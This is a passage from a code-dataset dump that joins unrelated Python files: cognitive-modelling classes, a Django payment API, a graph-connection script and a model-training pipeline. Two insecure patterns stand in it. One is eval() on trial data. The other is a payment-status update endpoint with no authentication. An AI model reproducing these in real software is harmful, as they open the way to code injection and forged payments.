self.updateQTD(0,s1, a1, s2, a2, alpha1)\n delta2 = self.updateQTD(r, s2, a2, alpha=alpha2)\n self.Q_TD_values[(s1, a1)] += alpha1*lam*delta2\n # update MB values\n self.transition_counts[(a1,s2)] += 1\n # define T:\n if (self.transition_counts[(0,1)]+self.transition_counts[(1,2)]) > \\\n (self.transition_counts[(0,2)]+self.transition_counts[(1,1)]):\n T = {(0,1):.7, (0,2):.3, (1,1):.3, (1,2):.7}\n else: \n T = {(0,1):.3, (0,2):.7, (1,1):.7, (1,2):.3}\n self.updateQMB(T)\n \n def get_softmax_probs(self,stages,last_choice):\n W = self.W\n if type(stages) != list:\n stages = [stages]\n # stage one and two choices\n P_action = numpy.zeros(2)\n # choice probabilities\n choice_probabilities = []\n for stage in stages:\n for i,a in enumerate(self.stage_action_list[stage]):\n Qnet = (W)*self.Q_MB_values[stage,a] + (1-W)*self.Q_TD_values[stage,a]\n repeat = (self.p*(a==last_choice))\n P_action[i] = exp(self.B1*(Qnet+repeat))\n P_action/=numpy.sum(P_action)\n choice_probabilities.append(P_action.copy())\n return choice_probabilities\n \n def run_trial(self,trial,last_choice):\n s1 = int(trial['stage']); s2 = int(trial['stage_second'])\n a1 = int(trial['stim_selected_first']); a2 = int(trial['stim_selected_second'])\n r = int(trial['feedback'])\n # return probability of all actions\n probs1, probs2 = self.get_softmax_probs([s1,s2],last_choice)\n # get probability of selected actions\n Pa1 = probs1[a1]\n Pa2 = probs2[self.stage_action_list[s2].index(a2)]\n self.trialUpdate(s1,s2,a1,a2,r,self.alpha1,self.alpha2,self.lam)\n return Pa1,Pa2\n \n def run_trials(self, df):\n # run trials\n last_choice = -1\n action_probs = []\n Q_vals = []\n MB_vals = []\n for i,trial in df.iterrows():\n Q_vals.append(self.Q_TD_values.copy())\n MB_vals.append(self.Q_MB_values.copy())\n Pa1, Pa2 = self.run_trial(trial,last_choice)\n action_probs.append((Pa1,Pa2))\n last_choice = trial['stim_selected_first']\n self.sum_neg_ll = numpy.sum(-numpy.log(list(zip(*action_probs))[0])) + numpy.sum(-numpy.log(list(zip(*action_probs))[1])) \n \n def simulate(self, ntrials=10):\n trials = []\n reward_probs = numpy.random.rand(6)*.5+.25 #rewards for each action\n reward_probs[0:2] = 0\n transition_probs = [.7,.3] #transition to new stages (probability to go to stage 2)\n # initial conditions\n last_choice = -1\n for trial in range(ntrials):\n s1 = 0\n # get first choice without knowing the second choice\n first_action_probs = self.get_softmax_probs(s1,last_choice)[0]\n a1 = numpy.random.choice(self.stage_action_list[s1], p=first_action_probs)\n # get second stage\n s2 = numpy.random.binomial(1,transition_probs[a1])+1\n second_action_probs = self.get_softmax_probs(s2,last_choice)[0]\n a2 = numpy.random.choice(self.stage_action_list[s2], p=second_action_probs)\n feedback = numpy.random.binomial(1,reward_probs[a2]) \n trials.append({'stage':s1, 'stage_second':s2,\n 'stim_selected_first':a1,'stim_selected_second':a2,\n 'feedback':feedback,\n 'first_action_prob': first_action_probs[a1],\n 'second_action_prob': second_action_probs[self.stage_action_list[s2].index(a2)]})\n self.trialUpdate(s1,s2,a1,a2,feedback,self.alpha1,self.alpha2,self.lam)\n last_choice = a1\n reward_probs[2:]+=numpy.random.randn(4)*.025\n reward_probs[2:] = numpy.maximum(numpy.minimum(reward_probs[2:],.75),.25)\n return trials\n \n def get_neg_ll(self):\n return self.sum_neg_ll\n\n\n# Functions to define Hierarchical Rule MoE Model (Frank & Badre, 2011)\nclass Flat_SubExpert():\n def __init__(self, features, data, kappa):\n self.kappa = kappa # kappaerature for softmax\n self.features = features\n self.feature_types = [numpy.unique(data.loc[:, f]) for f in features]\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # create dictionary of learned beta parameters\n self.reward_probabilities = {}\n for key in product(*self.feature_types, self.actions):\n self.reward_probabilities[key] = {'a':1, 'b': 1}\n \n def update(self, trial):\n correct = trial.correct\n action = trial.key_press\n features = trial[self.features].tolist()\n update_key = 'a' if correct else 'b'\n self.reward_probabilities[tuple(features + [action])][update_key] += 1\n \n def get_action_probs(self, trial):\n def subset(lst1, lst2):\n \"\"\"test if lst1 is subset of lst2\"\"\"\n return set(lst1) <= set(lst2)\n features = trial[self.features].tolist()\n key_subset = [k for k in self.reward_probabilities.keys() if subset(features,k)]\n action_probs = {}\n for key in key_subset:\n raw_prob = beta(**self.reward_probabilities[key]).mean()\n # take softmax\n prob = numpy.e**(raw_prob/self.kappa)\n action_probs[key[-1]] = prob\n # normalize by total\n sum_probs = sum(action_probs.values())\n action_probs = {k: v/sum_probs for k,v in action_probs.items()}\n return action_probs\n \nclass Hierarchical_SubExpert():\n \"\"\" Suboridinate Hierarchical Expert\n \n This class instantatiates an expert that learns about one or more features\n contextualized on another feature. In the context of the model, this class\n is used for simple experts that learn (for example) the reward probabilities\n of (shape|color).\n \"\"\"\n def __init__(self, features, context, data, kappa):\n self.kappa = kappa # kappaerature for softmax\n self.features = features\n self.feature_types = [numpy.unique(data.loc[:, f]) for f in features]\n self.context = context\n self.context_types = numpy.unique(data.loc[:, context])\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # create dictionary of learned beta parameters\n self.reward_probabilities = {}\n for c in self.context_types:\n self.reward_probabilities[c] = {}\n for key in product(*self.feature_types, self.actions):\n self.reward_probabilities[c][key] = {'a':1, 'b': 1}\n \n def update(self, trial):\n correct = trial.correct\n action = trial.key_press\n features = trial[self.features].tolist()\n context = trial[self.context]\n update_key = 'a' if correct else 'b'\n self.reward_probabilities[context][tuple(features + [action])][update_key] += 1\n \n def get_action_probs(self, trial):\n def subset(lst1, lst2):\n \"\"\"test if lst1 is subset of lst2\"\"\"\n return set(lst1) <= set(lst2)\n features = trial[self.features].tolist()\n context = trial[self.context]\n key_subset = [k for k in self.reward_probabilities[context].keys() if subset(features,k)]\n action_probs = {}\n for key in key_subset:\n raw_prob = beta(**self.reward_probabilities[context][key]).mean()\n # take softmax\n prob = numpy.e**(raw_prob/self.kappa)\n action_probs[key[-1]] = prob\n # normalize by total\n sum_probs = sum(action_probs.values())\n action_probs = {k: v/sum_probs for k,v in action_probs.items()}\n return action_probs\n\n\nclass Expert():\n def update_confidence(self, trial):\n choice = trial.key_press\n r = trial.correct # reward\n e_action_probs = [e.get_action_probs(trial) for e in self.experts]\n # models are assigned credit for the choice if their action_probs\n # gave a higher value to the actual choice than the others\n credit_assignment = []\n for action_probs in e_action_probs:\n choice_prob = action_probs[choice]\n others = [v for k,v in action_probs.items() if k != choice]\n credited = all(numpy.less(others, choice_prob))\n credit_assignment.append(credited)\n # update \n # if the expert contributed the the choice, set reward to \"r\"\n # if the expert did not contribute, set the reward to 1-r.\n updates = [r*c+(1-r)*(1-c) for c in credit_assignment]\n # update alpha and beta based on updates\n for i, update in enumerate(updates):\n update_param = ['b','a'][int(update)]\n self.confidences[i][update_param] += 1\n \n def update_experts(self, trial):\n for e in self.experts:\n # if the subordinate experts are \"subordinate\" they only have an\n # update method. otherwise they have an update_experts method\n try:\n e.update(trial)\n except AttributeError:\n e.update_confidence(trial)\n e.update_experts(trial)\n \n def get_action_probs(self, trial):\n e_action_probs = [e.get_action_probs(trial) for e in self.experts]\n e_confidences = self.get_expert_confidences(trial)\n action_probs = {}\n for action in self.actions:\n # get action probs across experts\n probs = [e[action] for e in e_action_probs]\n # weight probs by expert attention\n weighted_prob = numpy.dot(probs, e_confidences)\n action_probs[action] = weighted_prob\n return action_probs \n \nclass Flat_Expert(Expert):\n \"\"\" Model for Hierarchical Rule Learning Task\n \n ref: Frank, M. J., & Badre, D. (2012). Mechanisms of hierarchical... (Part1)\n \"\"\"\n def __init__(self, data, kappa, zeta, alphaC, alphaO, alphaS,\n beta2, beta3):\n \"\"\" Initialize the model\n \n Args:\n data: dataframe of hierarchical rule task\n kappa: kappaerature for individual experts softmax function\n zeta: softmax parameter to arbitrate between experts\n uni_confidences: initial alpha and beta params\n for unidimensional experts. These should be supplied in\n orient, color, shape order.\n full_confidence: initial alpha and beta perams for fully\n conjunctive expert\n beta2: beta parameter for 2-way conjunctions. Alpha parameter\n is determined by unidimensional experts\n \"\"\"\n self.zeta = zeta\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # single feature\n self.orient_e = Flat_SubExpert(['orientation'], data, kappa)\n self.color_e = Flat_SubExpert(['border'], data, kappa)\n self.shape_e = Flat_SubExpert(['stim'], data, kappa)\n # 2 combination \n self.orient_color_e = Flat_SubExpert(['orientation', 'border'], data, kappa)\n self.orient_shape_e = Flat_SubExpert(['orientation', 'stim'], data, kappa)\n self.shape_color_e = Flat_SubExpert(['stim', 'border'], data, kappa) \n # all 3\n self.all_e = Flat_SubExpert(['orientation','border','stim'], data,kappa)\n self.experts = [self.orient_e,\n self.color_e,\n self.shape_e,\n self.orient_color_e,\n self.orient_shape_e,\n self.shape_color_e,\n self.all_e]\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n O_confidence = {'a': 1+alphaO, 'b': 2}\n C_confidence = {'a': 1+alphaC, 'b': 2}\n S_confidence = {'a': 1+alphaS, 'b': 2}\n OC_confidence = {'a': 1+(alphaO+alphaC)/2, 'b': 2+beta2}\n OS_confidence = {'a': 1+(alphaO+alphaS)/2, 'b': 2+beta2}\n SC_confidence = {'a': 1+(alphaS+alphaC)/2, 'b': 2+beta2}\n OSC_confidence = {'a': 1+(alphaO+alphaS+alphaC)/3, 'b': 3+beta3}\n\n \n self.confidences = [O_confidence,\n C_confidence,\n S_confidence,\n OC_confidence,\n OS_confidence,\n SC_confidence,\n OSC_confidence]\n \n def get_expert_confidences(self, trial):\n # get attention weights (softmax of confidences)\n e_confidences = [numpy.e**(beta(**p).mean()/self.zeta) for p in self.confidences]\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \nclass Hierarchical_Expert(Expert):\n \"\"\" Hierarchical expert with two subordinate\n \n This expert reflects the combination of two subordinate experts over one\n context. For example, if \"color\" is the context, the two subordinate would\n be shape|color and orientation|color\n \"\"\"\n def __init__(self, subfeatures, context, data, kappa, zeta):\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n self.zeta = zeta\n self.context = context\n self.context_types = numpy.unique(data.loc[:, context])\n # define subordinate condition experts\n self.experts = []\n for feature in subfeatures:\n expert = Hierarchical_SubExpert([feature], context, data, kappa)\n self.experts.append(expert)\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n self.confidences = {}\n for c in self.context_types:\n self.confidences[c] = [{'a': 1, 'b': 1} for _ in range(len(self.experts))]\n\n def update_confidence(self, trial):\n choice = trial.key_press\n r = trial.correct # reward\n context = trial[self.context]\n e_action_probs = [e.get_action_probs(trial) for e in self.experts]\n # models are assigned credit for the choice if their action_probs\n # gave a higher value to the actual choice than the others\n credit_assignment = []\n for action_probs in e_action_probs:\n choice_prob = action_probs[choice]\n others = [v for k,v in action_probs.items() if k != choice]\n credited = all(numpy.less(others, choice_prob))\n credit_assignment.append(credited)\n # update \n # if the expert contributed the the choice, set reward to \"r\"\n # if the expert did not contribute, set the reward to 1-r.\n updates = [r*c+(1-r)*(1-c) for c in credit_assignment]\n # update alpha and beta based on updates\n for i, update in enumerate(updates):\n update_param = ['b','a'][int(update)]\n self.confidences[context][i][update_param] += 1\n \n def get_expert_confidences(self, trial):\n # get attention weights (softmax of confidences)\n c = trial[self.context]\n e_confidences = [numpy.e**(beta(**p).mean()/self.zeta) for p in self.confidences[c]]\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \nclass Hierarchical_SuperExpert(Expert):\n \"\"\" Instantiates the superordinate hierarchical expert\n \n This class instantiates three hierarchical experts each with a different\n context - either color, orientation, or shape\n \"\"\"\n def __init__(self, data, kappa, zeta):\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # define hierarchical experts\n self.color_expert = Hierarchical_Expert(['stim','orientation'], 'border', data, kappa, zeta)\n self.orientation_expert = Hierarchical_Expert(['stim','border'], 'orientation', data, kappa, zeta)\n self.shape_expert = Hierarchical_Expert(['border','orientation'], 'stim', data, kappa, zeta) \n self.experts = [self.color_expert, \n self.orientation_expert, \n self.shape_expert]\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n self.confidences = [{'a': 1, 'b': 1} for _ in range(len(self.experts))]\n \n\n def get_expert_confidences(self, trial):\n # get attention weights - unclear if softmax\n e_confidences = [beta(**p).mean() for p in self.confidences]\n #e_confidences = [numpy.e**(beta(**p).mean()/self.zeta) for p in self.confidences\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \nclass MoE_Model(Expert):\n def __init__(self, data, kappa, zeta, xi, alphaC, alphaO, alphaS,\n beta2, beta3, beta_hierarchy):\n \"\"\"\n \n Args:\n data: dataframe for hierarchical rule task\n kappa: softmax parameter for action probabilities, passed to\n subordinate experts\n zeta: softmax parameter for arbitration between subordinate experts\n of hierarchical and flat experts\n xi: softmax parameter for arbitration between \n hierarchical and flat experts\n \"\"\"\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n self.xi = xi\n # set up experts\n self.hierarchical_expert = Hierarchical_SuperExpert(data, kappa, zeta)\n self.flat_expert = Flat_Expert(data, kappa, zeta, alphaC, alphaO, alphaS,\n beta2, beta3)\n self.experts = [self.hierarchical_expert, self.flat_expert]\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n self.confidences = [{'a': 1, 'b': beta_hierarchy}, {'a': 1, 'b': 1}]\n \n \n def get_expert_confidences(self, trial):\n # get attention weights - unclear if softmax\n e_confidences = [numpy.e**(beta(**p).mean()/self.xi) for p in self.confidences]\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \n def get_all_confidences(self, trial):\n confidences = {}\n confidences['hierarchy'] = self.get_expert_confidences(trial)[0]\n \n hierarchical_expert = self.experts[0]\n color, orientation, shape = hierarchical_expert.get_expert_confidences(trial)\n confidences['hier_color'] = color\n confidences['hier_orientation'] = orientation\n confidences['hier_shape'] = shape\n \n flat_expert = self.experts[1]\n flat_confidences = flat_expert.get_expert_confidences(trial)\n confidences['flat_orientation'] = flat_confidences[0]\n confidences['flat_color'] = flat_confidences[1]\n confidences['flat_shape'] = flat_confidences[2]\n confidences['flat_OC'] = flat_confidences[3]\n confidences['flat_OS'] = flat_confidences[4]\n confidences['flat_CS'] = flat_confidences[5]\n confidences['flat_OSC'] = flat_confidences[6]\n \n return confidences\n \n \nfrom lmfit import Minimizer, Parameters\n# Functions to define Shift Task model (Wilson & Niv, 2012)\nclass fRL_Model():\n def __init__(self, data, decay_weights=False,\n verbose=False):\n self.data = data\n # scrub data\n self.data = data.query('rt != -1')\n # get features\n stim_features = json.loads(data.stims[0])\n colors = [i['color'] for i in stim_features]\n patterns = [i['pattern'] for i in stim_features]\n shapes = [i['shape'] for i in stim_features]\n all_features = colors+patterns+shapes\n # set up class vars\n self.weights = {f: 0 for f in all_features}\n self.decay = 0\n self.beta=1\n self.eps=0\n self.lr = .01\n self.decay_weights=decay_weights\n self.verbose=verbose\n \n def get_stim_value(self, stim):\n return numpy.sum([self.weights[v] for v in stim.values()]) \n \n def get_choice_prob(self, trial):\n stims = json.loads(trial.stims)\n stim_values = [self.get_stim_value(stim) for stim in stims]\n # compute softmax decision probs\n f = lambda x: numpy.e**(self.beta*x)\n softmax_values = [f(v) for v in stim_values]\n normalized = [v/numpy.sum(softmax_values) for v in softmax_values]\n # get prob of choice\n choice_prob = normalized[int(trial.choice_position)]\n # incorporate eps\n choice_prob = (1-self.eps)*choice_prob + (self.eps)*(1/3)\n return choice_prob\n \n def get_params(self):\n return {'beta': self.beta,\n 'decay': self.decay,\n 'lr': self.lr,\n 'eps': self.eps}\n \n def update(self, trial):\n if type(trial.choice_stim) == str:\n choice = eval(trial.choice_stim)\n else:\n choice = trial.choice_stim\n reward = trial.feedback\n value = self.get_stim_value(choice)\n delta = self.lr*(reward-value)\n for key in choice.values():\n self.weights[key] += delta\n # decay non choice features\n for key in set(self.weights.keys()) - set(choice.values()):\n self.weights[key] *= (1-self.decay)\n \n def run_data(self):\n probs = []\n attention_weights = []\n for i, trial in self.data.iterrows():\n probs.append(self.get_choice_prob(trial))\n self.update(trial)\n attention_weights.append(self.weights.copy())\n return probs, attention_weights\n \n def optimize(self):\n def loss(pars):\n #unpack params\n parvals = pars.valuesdict()\n self.beta = parvals['beta']\n self.decay = parvals['decay']\n self.lr = parvals['lr']\n self.eps = parvals['eps']\n probs, attention_weights = self.run_data()\n neg_log_likelihood = -numpy.sum(numpy.log(probs))\n return neg_log_likelihood\n \n def track_loss(params, iter, resid):\n if iter%100==0:\n print(iter, resid)\n \n params = Parameters()\n if self.decay_weights:\n params.add('decay', value=0, min=0, max=1)\n else:\n params.add('decay', value=0, vary=False)\n params.add('beta', value=1, min=.01, max=100)\n params.add('eps', value=0, min=0, max=1)\n params.add('lr', value=.1, min=.000001, max=1)\n \n if self.verbose==False:\n fitter = Minimizer(loss, params)\n else:\n fitter = Minimizer(loss, params, iter_cb=track_loss)\n fitter.scalar_minimize(method='Nelder-Mead', options={'xatol': 1e-3,\n 'maxiter': 200})\n\n \n \n \n ","sub_path":"expanalysis/experiments/psychological_models.py","file_name":"psychological_models.py","file_ext":"py","file_size_in_byte":24417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"559379788","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets, status\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom core.models import Payment\nfrom payment import serializers\nfrom .tools import Tools\n\n\nclass PaymentViewSet(viewsets.ModelViewSet):\n \"\"\"\n list:\n list all payments\n create:\n create a payments from current user\n retrieve:\n get a payment by id campaing\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated,)\n queryset = Payment.objects.all()\n serializer_class = serializers.PaymentSerializer\n\n def get_queryset(self):\n queryset = Payment.objects.all()\n return queryset\n\n def retrieve(self, request, pk):\n queryset = Payment.objects.all()\n current_payment = get_object_or_404(queryset, pk=pk)\n serializer = self.serializer_class(current_payment)\n return Response(\n {'data': serializer.data},\n status=status.HTTP_200_OK\n )\n\n def perform_create(self, serializer):\n return serializer.save(user=self.request.user)\n\n\nclass PaymentInCome(viewsets.ModelViewSet):\n \"\"\"\n list:\n show all payments\n update:\n update status payment by request from company payment\n \"\"\"\n serializer_class = serializers.PayIncomeSerializer\n\n def get_queryset(self):\n queryset = Payment.objects.all()\n return queryset\n\n def update(self, request, pk=None):\n try:\n c_tools = Tools()\n current_user = c_tools.validate_user(request.data.get('user'))\n current_campaing = c_tools.validate_campaing(\n request.data.get('campaing')\n )\n current_payment = Payment.objects.get(\n user=current_user,\n campaing=current_campaing\n )\n serializer = self.serializer_class(\n current_payment,\n data=request.data\n )\n\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(\n {'data': 'payment update successfully.'},\n status=status.HTTP_200_OK\n )\n\n return Response(\n {'error': 'something wrong.'},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n except Exception as err:\n return Response({'error': f'{err}'})\n","sub_path":"apiuser/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"317099204","text":"# -*- coding: utf-8 -*-\n\nimport json\n\n\nwith open('nodes.json', 'r') as f:\n nodes = json.load(f)\n\nconnections = []\n\nfor node in nodes:\n code = node['code']\n for connection in node['connections']:\n arrivalCode = connection['code']\n\n c = {\n 'code1': code,\n 'code2': arrivalCode\n }\n\n cInverted = {\n 'code1': arrivalCode,\n 'code2': code\n }\n\n if (c not in connections and cInverted not in connections):\n connections.append(c)\n\nwith open('connections.json', 'w') as f:\n json.dump(connections, f, ensure_ascii=False, separators=(',', ':'))\n\nprint('len(connections)')\nprint(len(connections))\n# => 12687\n","sub_path":"node/makeConnections.py","file_name":"makeConnections.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83769679","text":"'''\n train main class\n\n @author neucrack@sipeed\n @license Apache 2.0 © 2020 Sipeed Ltd\n'''\n\nimport os, sys\nroot_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\"))\nsys.path.append(root_path)\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\n\nfrom classifier import Classifier\nfrom detector import Detector\nimport requests\nimport tempfile\nimport shutil\nfrom utils import gpu_utils, isascii\nfrom utils.logger import Logger, Fake_Logger\nfrom instance import config\nimport time\nfrom datetime import datetime\nimport subprocess\nimport zipfile\nimport traceback\nimport json\nfrom enum import Enum\n\nclass TrainType(Enum):\n CLASSIFIER = 0\n DETECTOR = 1\n\nclass TrainFailReason(Enum):\n ERROR_NONE = 0\n ERROR_INTERNAL = 1\n ERROR_DOWNLOAD_DATASETS = 2\n ERROR_NODE_BUSY = 3\n ERROR_PARAM = 4\n ERROR_CANCEL = 5\n\n\nclass Train():\n def __init__(self, train_type: TrainType,\n datasets_zip,\n dataset_dir,\n out_dir):\n '''\n creat /temp/train_temp dir to train\n '''\n self.train_type = train_type\n self.datasets_zip_path = datasets_zip\n self.dataset_dir = dataset_dir\n self.temp_dir = out_dir\n assert os.path.exists(datasets_zip) or os.path.exists(dataset_dir)\n if os.path.exists(dataset_dir):\n self.datasets_dir = dataset_dir\n else:\n self.datasets_dir = \"\"\n self.temp_datasets_dir = os.path.join(self.temp_dir, \"datasets\")\n self.result_dir = os.path.join(self.temp_dir, \"result\")\n self.clean_temp_files()\n os.makedirs(self.temp_dir)\n if os.path.exists(self.result_dir):\n shutil.rmtree(self.result_dir)\n os.makedirs(self.result_dir)\n self.dataset_sample_images_path = os.path.join(self.temp_dir, \"sample_images\")\n os.makedirs(self.dataset_sample_images_path)\n self.log_file_path = os.path.join(self.temp_dir, \"train_log.log\")\n self.result_report_img_path = os.path.join(self.result_dir, \"report.jpg\")\n self.result_kmodel_path = os.path.join(self.result_dir, \"m.kmodel\")\n self.result_labels_path = os.path.join(self.result_dir, \"labels.txt\")\n self.result_boot_py_path = os.path.join(self.result_dir, \"boot.py\")\n self.tflite_path = os.path.join(self.temp_dir, \"m.tflite\")\n self.final_h5_model_path = os.path.join(self.temp_dir, \"m.h5\")\n self.best_h5_model_path = os.path.join(self.temp_dir, \"m_best.h5\")\n\n self.log = Logger(file_path=self.log_file_path)\n \n def __del__(self):\n # self.clean_temp_files()\n pass\n \n def clean_temp_files(self):\n if os.path.exists(self.temp_dir):\n shutil.rmtree(self.temp_dir)\n\n\n def __on_progress(self, percent, msg): # flag: progress\n self.log.i(f\"progress: {percent}%, {msg}\")\n \n def __on_success(self, result_url, warn):\n self.log.i(f\"success: out_dir: {result_url}\")\n if warn:\n self.log.w(f\"warnings:\\n {warn}\")\n\n def __on_fail(self, reson, msg, warn):\n self.log.e(f\"failed: {reson}, {msg}\")\n if warn:\n self.log.w(f\"warnings:\\n {warn}\")\n\n def __on_train_progress(self, percent, msg): # flag: progress\n percent = percent*0.97 + 1\n self.log.i(f\"progress: {percent}%, {msg}\")\n\n def train(self):\n warning_msg = \"\"\n try:\n result_url, warning_msg = self.train_process(self.log)\n self.__on_success(result_url, warning_msg)\n except Exception as e:\n info = e.args[0]\n if type(info) == tuple and len(info) == 2:\n reason = info[0]\n msg = info[1]\n self.__on_fail(reason, msg, warning_msg)\n else:\n self.__on_fail(TrainFailReason.ERROR_INTERNAL, \"node error:{}\".format(e), warning_msg)\n\n def train_process(self, log):\n '''\n raise Exception if error occurred, a tuple: (TrainFailReason, error_message)\n @return result url\n '''\n self.__on_progress(0, \"start\") # flag: progress\n self.__on_progress(1, \"start train\") # flag: progress\n \n if self.train_type == TrainType.CLASSIFIER:\n obj, prefix = self.classifier_train(log = log)\n elif self.train_type == TrainType.DETECTOR:\n obj, prefix = self.detector_train(log = log)\n else:\n raise Exception(( \"error train type, not suport\"))\n \n # check warnings\n result_warning_msg = \"\"\n result_warning_msg_path = os.path.join(self.result_dir, \"warning.txt\")\n if len(obj.warning_msg) > 0:\n result_warning_msg += \"=========================================================================\\n\"\n result_warning_msg += \"train warnings: these warn info may lead train error(accuracy loss), please check carefully\\n\"\n result_warning_msg += \"=========================================================================\\n\"\n result_warning_msg += \"训练警告: 这些警告信息可能导致训练误差,请务必仔细检查\\n\"\n result_warning_msg += \"=========================================================================\\n\\n\\n\"\n for msg in obj.warning_msg:\n result_warning_msg += \"{}\\n\\n\".format(msg)\n with open(result_warning_msg_path, \"w\") as f:\n f.write(result_warning_msg)\n\n # pack zip\n log.i(\"pack result to zip file\")\n time_now = datetime.now().strftime(\"%Y_%m_%d__%H_%M\")\n result_dir_name = \"{}_{}\".format(prefix, time_now)\n result_zip_name = \"{}.zip\".format(result_dir_name)\n result_dir = os.path.join(os.path.dirname(self.result_dir), result_dir_name)\n os.rename(self.result_dir, result_dir)\n root_dir = os.path.join(self.temp_dir, \"result_root_dir\")\n os.mkdir(root_dir)\n shutil.move(result_dir, root_dir) # 移动 result 文件夹, 到一个 root_dir下,用以压缩\n result_zip = os.path.join(self.temp_dir, result_zip_name)\n try: \n # self.zip_dir(root_dir, result_zip)\n # for old maixhub compatibility\n self.zip_dir(os.path.join(root_dir, result_dir_name), result_zip)\n except Exception:\n log.e(\"zip result fail\")\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"zip result error\"))\n\n # progress 99%\n self.__on_progress(99, \"pack ok\") # flag: progress\n\n # complete\n self.__on_progress(100, \"task complete\") # flag: progress\n log.i(\"OK, task complete, result uri: {}\".format(result_zip))\n return result_zip, result_warning_msg\n\n def classifier_train(self, log):\n # 检测 GPU 可用,选择一个可用的 GPU 使用\n try:\n gpu = gpu_utils.select_gpu(memory_require = config.classifier_train_gpu_mem_require, tf_gpu_mem_growth=False)\n except Exception:\n gpu = None\n if gpu is None:\n if not config.allow_cpu:\n log.e(\"no free GPU\")\n raise Exception((TrainFailReason.ERROR_NODE_BUSY, \"node no enough GPU or GPU memory and not support CPU train\"))\n log.i(\"no GPU, will use [CPU]\")\n else:\n log.i(\"select\", gpu)\n\n # 启动训练\n try:\n classifier = Classifier(datasets_zip=self.datasets_zip_path, datasets_dir=self.datasets_dir, unpack_dir = self.temp_datasets_dir,\n logger=log,\n max_classes_num=config.classifier_train_max_classes_num,\n min_images_num=config.classifier_train_one_class_min_img_num,\n max_images_num=config.classifier_train_one_class_max_img_num,\n allow_reshape=False)\n except Exception as e:\n log.e(\"train datasets not valid: {}\".format(e))\n raise Exception((TrainFailReason.ERROR_PARAM, \"datasets not valid: {}\".format(str(e))))\n try:\n classifier.train(epochs=config.classifier_train_epochs, batch_size=config.classifier_train_batch_size, progress_cb=self.__on_train_progress)\n except Exception as e:\n log.e(\"train error: {}\".format(e))\n traceback.print_exc()\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"error occurred when train, error: {}\".format(str(e)) ))\n\n # 训练结束, 生成报告\n log.i(\"train ok, now generate report\")\n classifier.report(self.result_report_img_path)\n\n # 生成 kmodel\n log.i(\"now generate kmodel\")\n classifier.save(self.tflite_path+\".h5\", tflite_path=self.tflite_path)\n classifier.get_sample_images(config.sample_image_num, self.dataset_sample_images_path)\n ok, msg = self.convert_to_kmodel(self.tflite_path, self.result_kmodel_path, config.ncc_kmodel_v3, self.dataset_sample_images_path)\n if not ok:\n log.e(\"convert to kmodel fail\")\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"convert kmodel fail: {}\".format(msg) ))\n\n # 拷贝模板文件\n log.i(\"copy template files\")\n template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"classifier\", \"template\")\n self.__copy_template_files(template_dir, self.result_dir)\n\n # 写入 label 文件\n replace = 'labels = [\"{}\"]'.format('\", \"'.join(classifier.labels))\n with open(self.result_labels_path, \"w\") as f:\n f.write(replace)\n with open(self.result_boot_py_path) as f:\n boot_py = f.read()\n with open(self.result_boot_py_path, \"w\") as f:\n target = 'labels = [] # labels'\n boot_py = boot_py.replace(target, replace)\n target = 'sensor.set_windowing((224, 224))'\n replace = 'sensor.set_windowing(({}, {}))'.format(classifier.input_shape[1], classifier.input_shape[0])\n boot_py = boot_py.replace(target, replace)\n f.write(boot_py)\n\n return classifier, config.classifier_result_file_name_prefix\n\n def detector_train(self, log):\n # 检测 GPU 可用,选择一个可用的 GPU 使用\n try:\n gpu = gpu_utils.select_gpu(memory_require = config.detector_train_gpu_mem_require, tf_gpu_mem_growth=False)\n except Exception:\n gpu = None\n if gpu is None:\n if not config.allow_cpu:\n log.e(\"no free GPU\")\n raise Exception((TrainFailReason.ERROR_NODE_BUSY, \"node no enough GPU or GPU memory and not support CPU train\"))\n log.i(\"no GPU, will use [CPU]\")\n else:\n log.i(\"select\", gpu)\n\n # 启动训练\n try:\n detector = Detector(input_shape=(224, 224, 3),\n datasets_zip=self.datasets_zip_path,\n datasets_dir=self.datasets_dir,\n unpack_dir = self.temp_datasets_dir,\n logger=log,\n max_classes_limit = config.detector_train_max_classes_num,\n one_class_min_images_num=config.detector_train_one_class_min_img_num,\n one_class_max_images_num=config.detector_train_one_class_max_img_num,\n allow_reshape = False)\n except Exception as e:\n log.e(\"train datasets not valid: {}\".format(e))\n raise Exception((TrainFailReason.ERROR_PARAM, \"datasets not valid: {}\".format(str(e))))\n try:\n\n detector.train(epochs=config.detector_train_epochs,\n progress_cb=self.__on_train_progress,\n save_best_weights_path = self.best_h5_model_path,\n save_final_weights_path = self.final_h5_model_path,\n jitter=False,\n is_only_detect = False,\n batch_size = config.detector_train_batch_size,\n train_times = 5,\n 